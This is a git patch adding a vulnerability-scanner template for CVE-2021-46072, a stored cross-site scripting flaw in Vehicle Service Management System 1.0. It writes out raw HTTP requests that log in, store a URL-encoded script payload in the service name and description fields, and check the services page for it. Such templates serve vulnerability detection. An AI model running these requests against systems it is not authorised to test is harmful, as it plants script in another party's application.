From 833f05f9dfe9fcb77808194ae5e91f652d2f5047 Mon Sep 17 00:00:00 2001 From: TenBird-1 <109490477+TenBird-1@users.noreply.github.com> Date: Thu, 1 Sep 2022 00:35:41 +0900 Subject: [PATCH] CREATE CVE-2021-46072 --- cves/2021/CVE-2021-46072.yaml | 51 +++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 cves/2021/CVE-2021-46072.yaml diff --git a/cves/2021/CVE-2021-46072.yaml b/cves/2021/CVE-2021-46072.yaml new file mode 100644 index 0000000000..40869cae15 --- /dev/null +++ b/cves/2021/CVE-2021-46072.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-46072 +info: + name: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS) + author: TenBird + severity: Medium + description: A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-46072 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2021-46072 + cwe-id: CWE-79 + tags: cve,cve2021,Stored XSS,Cross-Site-Script + +requests: + - raw: + + - | + GET /vehicle_service/admin/login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{username}}&password={{password}} + + - | + POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1 + + - | + GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1 + Host: {{Hostname}} + + redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '">'